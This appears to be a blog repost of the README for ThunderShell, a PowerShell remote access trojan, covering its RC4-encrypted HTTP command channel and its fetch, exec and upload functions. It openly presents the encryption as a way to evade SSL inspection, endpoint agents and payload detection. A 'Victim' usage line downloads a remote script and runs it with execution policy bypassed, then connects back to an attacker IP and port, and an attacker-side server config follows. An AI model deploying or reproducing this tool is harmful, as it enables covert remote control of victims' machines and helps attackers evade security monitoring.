ThunderShell - PowerShell based RAT

Image result for powershell wallpaper
ThunderShell is a Powershell based RAT that rely on HTTP request to communicate. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network hooks.

Dependencies

apt install redis-server
apt install python-redis

Logs

Every errors, http requests and commands are logged in the logs folder.

How it works

Once the PowerShell script is executed and HTTP request will be issued to the server. The body of each POST request contains the RC4 encrypted communication. Why RC4 because it's strong enough to hide the traffic. The idea is to upload / download data over the network that cannot be inspected. The RAT support HTTPS but some security product may perform SSL interception and obtain visibility on your data leading to detection of malicious payload (PowerShell script, stager etc...). The RC4 encryption allows you to communicate over the wire without leaking your payload. The RC4 encryption also protects against endpoint agent that inspects traffic directly on the host, again the traffic is decrypted at the "software" level blocking detection at that level too.
To use the power of the tool there is some built-in function such as fetch, exec and upload that allow you to run your payload quite easily.
  • Fetch flow
The server will fetch a resource (path, url) 
        Send the data over the RC4 encrypted channel
                The PowerShell RAT will decrypt the payload 
                        PowerShell Execute the final payload
For example if you fetch PowerView.ps1 script it will be fully encrypted over the wire avoiding detection since the server is proxying the request and fully encrypt the data.

Usage

Victim:
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://ringzer0team.com/PS-RemoteShell.ps1'); PS-RemoteShell -ip 1.1.1.1 -port 8080 -Key test -Delay 2000
Attacker side example:
  • default.json:
{
        "redis-host": "localhost",
        "redis-port": 6379,

        "http-host": "192.168.17.129",
        "http-port": 8080,
        "http-server": "Microsoft-IIS/7.5",

        "https-enabled": "off",
        "https-cert-path": "cert.pem",

        "encryption-key": "test",
        "max-output-timeout": 5
}
Powered by Blogger.